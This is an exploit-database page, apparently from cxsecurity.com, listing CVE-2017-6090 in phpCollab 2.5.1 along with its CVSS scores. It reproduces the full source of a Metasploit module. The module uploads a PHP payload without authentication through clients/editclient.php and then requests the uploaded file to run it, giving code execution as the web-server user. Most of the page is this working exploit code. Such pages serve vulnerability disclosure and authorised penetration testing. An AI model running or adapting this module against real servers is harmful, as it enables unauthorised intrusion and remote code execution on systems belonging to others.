phpCollab 2.5.1 Unauthenticated File Upload

2018.01.11
Credit: Nick Marcoccio
Risk: High
Local: No
Remote: Yes
CVE: CVE-2017-6090
CWE: CWE-264


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in phpCollab 2.5.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user. The exploit has been tested on Ubuntu 16.04.3 64-bit }, 'Author' => [ 'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery 'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-6090' ], [ 'EDB', '42934' ], [ 'URL', 'http://www.phpcollab.com/' ], [ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 29 2017' )) register_options( [ OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"]) ]) end def check url = normalize_uri(target_uri.path, "general/login.php?msg=logout") res = send_request_cgi( 'method' => 'GET', 'uri' => url ) version = res.body.scan(/PhpCollab v([\d\.]+)/).flatten.first vprint_status("Found version: #{version}") unless version vprint_status('Unable to get the PhpCollab version.') return CheckCode::Unknown end if Gem::Version.new(version) >= Gem::Version.new('0') return CheckCode::Appears end CheckCode::Safe end def exploit filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php' id = File.basename(filename,File.extname(filename)) register_file_for_cleanup(filename) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"") print_status("Uploading backdoor file: #{filename}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'clients/editclient.php'), 'vars_get' => { 'id' => id, 'action' => 'update' }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if res && res.code == 302 print_good("Backdoor successfully created.") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end print_status("Triggering the exploit...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "logos_clients/" + filename) }, 5) end end

References:

https://cxsecurity.com/issue/WLB-2017100031


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top